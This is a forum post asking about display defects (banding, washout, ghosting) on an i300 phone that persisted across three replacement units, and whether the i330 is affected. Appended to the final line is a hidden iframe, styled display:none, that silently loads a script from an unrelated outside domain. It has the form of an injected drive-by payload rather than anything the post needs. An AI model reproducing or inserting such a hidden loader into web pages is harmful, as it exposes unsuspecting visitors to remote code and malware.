I'm sure this must have come up before, but maybe someone will be able to provide an up to date response. Since the first day that i got my i300 its had minor display issues.
Most noticably at first was a slight bumping to the display on the right side of the screen. It kinda looks as if the light hitting the screen had to go through about 6 speed bumps running parallel to the screen before it got there, leaving a very visible switching back and forth between normal display and darker spots running up the right side.
Also besides the general color washout, it looks great for about a split second as i turn on the phone, then it gets over brighted. (turn down the contrast!) i tried that which brings up the next problem. the greater the contrast gets, the more visible it is that at the top of the screen (near the logo area) the screen reprints a very faint trace of whats being displayed in lower areas of the screen, so i can see very slight images of my phone buttons across my logo area.
i still love the phone aside from the display issues, and i'm not planning to give it up for any other phone (aside from maybe an i330)

anytime soon, but these display issues only get more irritating as time goes on. i would think this was just an isolated issue with my hardware, but i had heard of a few others having the right-side-bumps problem even before i bought my phone, and when i got mine, sure enough there it was. i showed the ever-so-lovely people at circuit city this problem and they replaced my phone, twice. each one of them having the same display problem. this is the third i300 i've had and it occurs in all of them.
i'm guessing that this really isnt a fixable thing so such is life, it does however give me a great reason to bring it back again if i find that they only have i330's in stock. does anyone know this problem i'm having and if it occurs in i330's as well? again aside from this i'm still thrilled with the phone after having it for more than a year now, but if i could fix this one issue, well. it'd be neat.

tnx for any info you guys may provide!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
